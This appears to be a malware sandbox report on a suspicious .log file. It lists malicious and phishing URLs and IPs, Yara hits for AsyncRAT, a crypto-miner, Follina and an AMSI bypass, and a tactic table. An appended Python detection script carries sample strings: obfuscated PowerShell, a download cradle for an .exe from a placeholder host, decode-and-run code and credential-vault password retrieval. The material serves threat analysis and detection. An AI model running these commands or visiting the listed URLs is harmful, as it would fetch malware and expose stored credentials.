          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gengengma.com/wp-content/uploads/vipe_11/send.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gez.org.zw/errorpages/load/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://gorruck.com/random/8x8para.php
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://greatblueinds.com/ajx-admin/ckeditor/plugins/wsc/dialogs/3o9vbeip3k.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logString found in binary or memory: https://hide.link/lfspz
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/ajo/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/egab/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/emzf/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/lin/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hitechceramics.com/tism/processor.php
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hosteriaestilonorte.com.ar/admins/uzie/actions.php

          System Summary

          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: Detects PowerShell content designed to retrieve passwords from host Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: Detects JS potentially executing WMI queries Author: ditekSHen
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: Detects AsyncRAT Author: ditekSHen
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, score = file, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, score = file, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword author = ditekSHen, description = Detects PowerShell content designed to retrieve passwords from host
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery author = ditekSHen, description = Detects JS potentially executing WMI queries
          Source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log Virustotal: Detection: 16%
          Source: C:\Windows\System32\notepad.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32
          Source: classification engine Classification label: mal100.troj.expl.evad.mine.winLOG@1/0@0/0
          Source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT Key, CurrentCount FROM SdnEx WHERE Key = ? SELECT ID FROM SdnEx WHERE SdnEx.Key = ?; SELECT Count(1) FROM SdnEx; DELETE FROM SdnEx WHERE SdnEx.Key = ?; DELETE FROM SdnEx; INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
          Source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?; SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; DELETE FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?; SELECT COUNT(1) FROM FileLowFiAsync; INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?); DELETE FROM FileLowFiAsync WHERE InstanceTimeStamp < ?;
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log Static file information: File size 20971520 > 1048576
          Source: Binary string: )9 /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mpengine.pdb OGPS source: notepad.exe, 00000000.00000002.608934300.000001CF7AD07000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: /!#SCPT:Trojan:PowerShell/Bumblebee.PDB04LNK!MTB source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log

          Malware Analysis System Evasion

          Source: Yara match | File source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara match | File source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR
          Source: notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Z "/providers/microsoft.compute/virtualmachines/",
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
          Source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log VolumeInformation

          Remote Access Functionality

          Source: Yara match | File source: App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log, type: SAMPLE
          Source: Yara match | File source: Process Memory Space: notepad.exe PID: 5416, type: MEMORYSTR
          Tactic: techniques (number of matched signatures in parentheses)

          Initial Access: Replication Through Removable Media (1), Default Accounts, Domain Accounts
          Execution: Windows Management Instrumentation, Scheduled Task/Job, At (Linux)
          Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows)
          Privilege Escalation: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows)
          Defense Evasion: Direct Volume Access, Rootkit, Obfuscated Files or Information
          Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager
          Discovery: Security Software Discovery (1), Peripheral Device Discovery (1), System Information Discovery (11)
          Lateral Movement: Replication Through Removable Media (1), Remote Desktop Protocol, SMB/Windows Admin Shares
          Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive
          Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration
          Command and Control: Proxy (1), Junk Data, Steganography
          Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location
          Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          Impact: Modify System Partition, Device Lockout, Delete Device Data
          Source | Detection | Scanner | Label | Link
          App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log | 16% | Virustotal | | Browse
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          No contacted domains info
          Name | Source | Malicious | Antivirus Detection | Reputation
                        unknown
                        https://extraosseous.com/zik/document.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://172.245.119.43/recept/34.docnotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://luxtonace.com/luxton/plugins/ckeditor/plugins/a11yhelp/9gysz7pxb.phpApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://lidamtour.com/masivo/ala/cronsrt/App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://thomastongrealestate.com/skywkc/3415201.pngaApp1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://lidamtour.com/masivo/file/kmshost/notepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://ab.v-mail.online/?e=App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.logfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://107.173.143.102/hhh/invc_005400005400.wbknotepad.exe, 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        No contacted IP infos
                        Joe Sandbox Version:36.0.0 Rainbow Opal
                        Analysis ID:743454
                        Start date and time:2022-11-10 21:14:46 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 51s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:4
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.mine.winLOG@1/0@0/0
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Found application associated with file extension: .log
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        No simulations
                        No context
                        No created / dropped files found
                        File type:data
                        Entropy (8bit):7.001609475452913
                        TrID:
                        • MP3 audio (ID3 v1.x tag) (2501/1) 71.42%
                        • MP3 audio (1001/1) 28.58%
                        File name:App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        File size:20971520
                        MD5:988e0cb19fbc2cf5e3b9a33b205affd8
                        SHA1:1b091e30aa366a5cdf582a81954893ac6201f769
                        SHA256:c289adee6ca95bb69f864497f32a8abbad65d20dccd06c4a1f6c3ef6d402693d
                        SHA512:03b01dce8b2e53d4aa3735483cc0111298f02e31fc21010da57a0c31b8d8340170d3d74639e658f7f45456c11d811b025e26f4131d646112038d3f79c844f84c
                        SSDEEP:196608:4qvvbS9+lFh9AUwoupfvAdcUPPEXoEIJfEt3nvpn0A9bkWAJLaJEtTiVJkQ5uZTz:4K3lFh9Q7NXItEFvpn07YUiUF//dhr5
                        TLSH:8427AE5BB3A400E4D1B6C274C5169B67EBB27C0A1B2197CB1760765A2F336F18A3B3D1
                        File Content Preview:.K...jjccbbflaster1.ocxflaster3.ocxpasel32kernwnloadtoflaster2.ocxc:\nasterosa..)...-!#SCPT:TrojanDownloader:O97M/Qakbot.PDO85!MTB......K...c:\hefaggad\ukdfaovkga\buuefafa.dll...c:\hefaggad\ukdfaovkga\buuefafb.dll..)...-!#SCPT:TrojanDownloader:Win32/Lnkge
                        Icon Hash:74f4e4e4e4e4e4e4
                        No network behavior found
                        No statistics
                        Target ID:0
                        Start time:21:15:40
                        Start date:10/11/2022
                        Path:C:\Windows\System32\notepad.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\App1667895929112011200_34122CF1-AE58-41FB-8E13-C906CB8D40E6.log
                        Imagebase:0x7ff6b07c0000
                        File size:245760 bytes
                        MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: INDICATOR_SUSPICIOUS_PWSH_PasswordCredential_RetrievePassword, Description: Detects PowerShell content designed to retrieve passwords from host, Source: 00000000.00000002.575195265.000001CF7878C000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:high

                        No disassembly
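The four Yara matches recorded above for the notepad.exe process all fire on string content of the opened file as mapped into notepad's memory: the report shows no child process, no network behavior and no dropped files, and the file content preview itself carries antivirus detection names such as TrojanDownloader:O97M/Qakbot, so the hits describe what the file contains rather than anything it did. The script below is an added example, not Joe Sandbox's code and not the published Yara rules. It shows the string-level checks such rules make (caret-obfuscated "powershell" as cmd.exe would de-escape it, a WebClient download cradle, Base64 decode-and-run, and PasswordCredential.RetrievePassword()), in both ASCII and UTF-16LE (Yara "wide") form, and reports the byte offset of each hit. The regexes are my own approximations of the rules' logic, the caret check is generalised to any caret placement inside the keyword, and the SAMPLE buffer is constructed for the example, not taken from the analysed file.

```python
"""String-level triage of a suspect buffer, mirroring the kind of checks behind the
Yara hits recorded above. Added example: the regexes are approximations written for
this page, not the published rules, and SAMPLE is constructed, not the analysed file."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: re.Pattern
    must_contain: str = ""  # literal that must appear inside the match (e.g. a caret)


@dataclass(frozen=True)
class Hit:
    rule: str
    offset: int       # byte offset in the scanned buffer
    encoding: str     # "ascii" or "wide" (UTF-16LE), the two forms Yara string rules usually cover
    matched: str
    normalized: str   # matched text with cmd.exe escape carets removed


def _rx(p: str) -> re.Pattern:
    return re.compile(p, re.IGNORECASE)


RULES = [
    # cmd.exe strips unquoted '^' before running a command line, so p^o^w^e^r^s^h^e^l^l
    # executes as powershell. Generalised here to any number of carets at any position
    # inside the keyword; must_contain keeps a plain "powershell" from firing.
    Rule("powershell_caret_obfuscation", _rx(r"p\^*o\^*w\^*e\^*r\^*s\^*h\^*e\^*l\^*l"), "^"),
    # Download cradle and decode-and-run idiom common in PowerShell droppers.
    Rule("webclient_downloadfile", _rx(r"system\.net\.webclient\)\.downloadfile\(")),
    Rule("frombase64string_getstring", _rx(r"getstring\(\[convert\]::frombase64string\(")),
    # Windows.Security.Credentials.PasswordCredential.RetrievePassword() reveals vault
    # passwords in clear text; assumed to be the kind of content the
    # PasswordCredential_RetrievePassword rule above is after.
    Rule("passwordcredential_retrievepassword", _rx(r"\.retrievepassword\(\)")),
]


def _views(buf: bytes):
    """Yield (encoding, char_index_to_byte_offset, text) for the ASCII view and both
    UTF-16LE alignments, so wide strings are found regardless of where they start."""
    yield "ascii", (lambda i: i), buf.decode("latin-1")  # latin-1: one byte per char
    for align in (0, 1):
        chunk = buf[align:]
        chunk = chunk[: len(chunk) - len(chunk) % 2]
        text = chunk.decode("utf-16-le", errors="replace")
        # Re-encoding the prefix gives the exact byte length even where decoding merged
        # a surrogate pair or replaced a malformed unit.
        yield "wide", (lambda i, a=align, t=text: a + len(t[:i].encode("utf-16-le"))), text


def scan(buf: bytes) -> list[Hit]:
    hits = []
    for encoding, to_offset, text in _views(buf):
        for rule in RULES:
            for m in rule.pattern.finditer(text):
                s = m.group(0)
                if rule.must_contain and rule.must_contain not in s:
                    continue
                hits.append(Hit(rule.name, to_offset(m.start()), encoding, s, s.replace("^", "")))
    return sorted(hits, key=lambda h: (h.offset, h.rule))


def counts(hits: list[Hit]) -> dict[str, int]:
    out: dict[str, int] = {}
    for h in hits:
        out[h.rule] = out.get(h.rule, 0) + 1
    return out


# Constructed sample buffer: NUL padding around ASCII strings of the kinds the rules
# key on, one UTF-16LE string to exercise the wide path, and one plain "powershell"
# that must not trigger the caret rule.
SAMPLE = (
    b"\x00" * 16
    + b"cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -enc AAAA"
    + b"\x00" * 8
    + b'(New-Object System.Net.WebClient).DownloadFile("http://example.invalid/x.exe", "x.exe")'
    + b"\x00" * 8
    + b'[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("SQBFAFgA"))'
    + b"\x00" * 8
    + ("$v = New-Object Windows.Security.Credentials.PasswordVault; "
       "$v.RetrieveAll() | % { $_.RetrievePassword() }").encode("utf-16-le")
    + b"\x00" * 8
    + b"powershell.exe -enc AAAA"
)

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"0x{h.offset:x} {h.rule} [{h.encoding}]: {h.matched!r} -> {h.normalized!r}")
```

Run against a memory dump or the raw file, the output lists one line per hit with its byte offset, which is enough to confirm whether a sandbox verdict rests on embedded strings (as here) or on something the process actually executed; for the latter, the process tree, network and dropped-file sections of the report are the evidence to look at, not the string matches.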